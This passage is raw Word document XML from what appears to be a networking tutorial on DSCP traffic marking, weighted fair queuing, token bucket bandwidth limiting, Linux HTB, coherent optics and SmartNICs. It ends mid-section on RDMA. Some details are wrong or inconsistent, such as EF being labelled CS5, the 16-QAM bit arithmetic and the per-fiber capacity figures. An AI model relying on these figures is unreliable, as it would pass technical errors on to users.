        <w:t>DSCP (Differentiated Services Code Point):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB4DC2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>A 6-bit field in the IP header marking traffic priority. Network equipment (routers, switches) uses this marking to place packets in different queues with different scheduling treatment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA2F280" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E0F57" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>DSCP values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF333B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  EF (Expedited Forwarding, CS5): 46 — Voice/Video, lowest latency treatment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BD21DF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  AF41 (Assured Forwarding): 34 — Interactive video, high priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C92DC5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  AF31: 26 — Signaling/streaming, medium priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEDBC87" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  BE (Best Effort, CS0): 0 — Default, all traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A665858" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  CS1: 8 — Background/bulk, lowest priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357DE85" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weighted Fair Queuing (WFQ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0050C8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each traffic class gets a queue. The scheduler allocates bandwidth to queues proportional to their configured weights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2027F8E7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38846D24" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Queue weights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5BD2E6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  EF (voice/video): 40%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB68CB6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  AF41 (interactive): 30%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2240DCB7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  AF31 (streaming): 20%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D600D9B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  BE (best effort): 10%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6C4D4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="0DE9EAD6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>During congestion, each queue receives its weighted share of bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2C3D8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>EF queue is always served first (strict priority) to minimize voice/video latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538026D6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why QoS matters for API gateways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765EB2C2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>An API gateway serving both real-time and batch clients should mark traffic differently:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FCC692" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Real-time API calls (user-facing): mark as AF41 — get bandwidth priority over batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A9FE3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Batch/background API calls (data export, report generation): mark as BE — yield bandwidth to real-time traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4A0ED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Without QoS, a large batch data export can saturate the network link, degrading real-time API latency for all users — a single batch job affecting the entire user base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E9FA7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token Bucket for Bandwidth Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FB7BD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The same token bucket algorithm used for request rate limiting applies to </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth rate limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — but tokens represent bytes rather than requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88A0FC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94966C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Token bucket for 10Mbps bandwidth limit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315B93E3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  capacity: 1,250,000 bytes (1MB burst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21453F9D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  refill_rate: 1,250,000 bytes/second (10Mbps = 1.25MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A61CD5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD1D6E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For each packet of size N bytes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674EB6C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  refill tokens based on elapsed time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C73534" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  if tokens &gt;= N: consume N tokens, allow packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6250F337" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  if tokens &lt; N: drop or delay packet until N tokens accumulate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F7153" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The burst capacity (capacity) serves a critical function:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Network traffic is inherently bursty — a large object (image, video segment) may arrive in a burst. The burst capacity allows absorbing the burst without dropping packets, as long as the average rate stays within the limit. The token bucket smooths the burst over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB7004" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hierarchical token buckets (Linux TC HTB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640534C0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Linux's Traffic Control subsystem (tc) implements </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hierarchical Token Bucket (HTB)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — nested token buckets that share bandwidth according to a hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C587C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F70249" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Root: 1Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691F834F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> Interactive traffic: guaranteed 500Mbps, can burst to 1Gbps if others idle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD50E7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">│   </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> API calls: guaranteed 300Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29159AA4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>│   └── Web serving: guaranteed 200Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA4EA2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>└── Batch traffic: guaranteed 100Mbps, can burst to 500Mbps if interactive idle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E077A84" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> Uploads: guaranteed 60Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF3CF61" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">    └── Exports: guaranteed 40Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67678345" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each class has a guaranteed minimum bandwidth and can borrow unused bandwidth from other classes up to its ceiling. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>work-conserving scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — unused bandwidth is never wasted, it's lent to classes that can use it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923CF67" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="56B1D200">
          <v:rect id="_x0000_i4476" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD85405" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. The Future of Bandwidth — Emerging Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1C2719" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Coherent Optics — Pushing Fiber Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6614B768" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Current commercial fiber links use </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>coherent optical transmission</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — encoding multiple bits per symbol using both amplitude and phase of the light wave (QAM — Quadrature Amplitude Modulation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CCFC01" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16-QAM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> 4 bits per symbol (2 amplitude levels × 2 phase levels × 2 polarizations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC896E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64-QAM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> 6 bits per symbol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72611D58" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>256-QAM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> 8 bits per symbol (used in latest generation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFB7C0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Combined with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A29011C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WDM (Wavelength Division Multiplexing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> 80+ wavelengths per fiber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C9080" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Symbol rate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> 100–200 GBaud (100–200 billion symbols per second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE045C1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FEC (Forward Error Correction):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Error correction overhead that increases effective capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0F359" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Current state of the art: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>800Gbps per wavelength</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> in commercial deployments (Ciena, Infinera). Research demonstrations: 1.2Tbps per wavelength. A single fiber pair can carry </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64 Tbps</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (64 × 1Tbps wavelengths).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE48F73" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shannon limit</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> for a single-mode optical fiber has been estimated at ~100 Tbps — current commercial deployments are at ~64% of this theoretical maximum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FFAD4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network Disaggregation and White Box Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16267EDE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Traditional networking used proprietary hardware (Cisco, Juniper) with hardware and software bundled. </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>White box networking</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> separates hardware (commodity ASICs) from software (SONiC, DANOS, VyOS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDDDB32" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P4 (Programming Protocol-Independent Packet Processors):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A domain-specific language for programming network forwarding behavior in hardware ASICs. Enables custom packet processing (telemetry, load balancing, encryption) without leaving the ASIC — processing at line rate (100Gbps+) without CPU involvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232EF11F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SmartNICs (DPUs — Data Processing Units):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Network cards with embedded ARM cores, FPGAs, or specialized ASICs. Offload network processing (TLS, NVMe-oF, RDMA) from the host CPU to the NIC — freeing CPU cycles for application work while maintaining full network throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4F193" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bandwidth implications:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> As NICs reach 100Gbps, 200Gbps, 400Gbps, the CPU can no longer process packets fast enough (at 400Gbps, a 1500-byte packet arrives every 30ns — less than a single memory access). SmartNICs process packets entirely in hardware, maintaining full bandwidth utilization even at 400Gbps without CPU involvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1480E7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDMA — Bypassing the OS for Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1D1FE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDMA (Remote Direct Memory Access)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
